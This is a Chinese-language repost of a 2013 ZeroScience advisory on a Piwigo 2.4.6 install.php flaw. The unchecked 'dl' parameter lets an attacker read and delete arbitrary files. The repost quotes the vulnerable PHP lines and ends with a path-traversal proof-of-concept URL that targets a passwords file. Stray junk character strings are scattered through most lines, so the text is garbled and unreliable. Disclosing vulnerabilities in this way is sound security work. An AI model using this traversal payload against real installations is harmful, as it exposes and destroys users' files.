Piwigo任意文件泄露和任意文件删除漏洞

admin

Piwigo是用PHP编写的相册脚本。
4 y" I3 X( Z6 E
Piwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值，在实现上存在安全漏洞，攻击者可利用这些漏洞查看受影响计算机上的任意文件，删除受影响应用上下文内的任意文件。
) I2 A4 z3 n- K; I2 h. ?====================================================================
# ~' g: s3 K$ }+ B3 C/install.php:
7 o8 h0 l+ [6 }" P: @& A-------------
8 @- l  ]6 s8 |2 @: H; Y113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
114: {
115:   $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
116:   header('Cache-Control: no-cache, must-revalidate');
117:   header('Pragma: no-cache');
118:   header('Content-Disposition: attachment; filename="database.inc.php"');
119:   header('Content-Transfer-Encoding: binary');
' J. M1 ~& v$ e. ^, C6 x. W. z120:   header('Content-Length: '.filesize($filename));
121:   echo file_get_contents($filename);
122:   unlink($filename);
& ]! r" ^, E7 W4 S123:   exit();
124: }
  m- ~& Q. h; L( [' j; r9 |====================================================================
1 M7 l% E% U1 g# s$ k  k, d- ^
. b) s) N+ {$ l9 S) `8 UTested on: Microsoft Windows 7 Ultimate SP1 (EN)
+ J. A7 i; d2 a2 u( O; t0 v- J( _           Apache 2.4.2 (Win32)
1 ~/ w( G7 F& s, o/ r3 s1 B6 j6 m/ O           PHP 5.4.4
           MySQL 5.5.25a
( ]2 m- o) y# t3 g. S( |# t
9 u* _2 t" Z: h  `5 ^Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
/ m& |0 s. a0 y3 ^0 k# v
+ d* x) w8 e' ^. gAdvisory ID: ZSL-2013-5127
4 o8 n  F# t3 ^( Q- V& o& g* S2 z9 ZAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
Vendor Patch: http://piwigo.org/bugs/view.php?id=2843

15.02.2013

--
http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt
) Z$ \- q; ~6 L# V! F8 H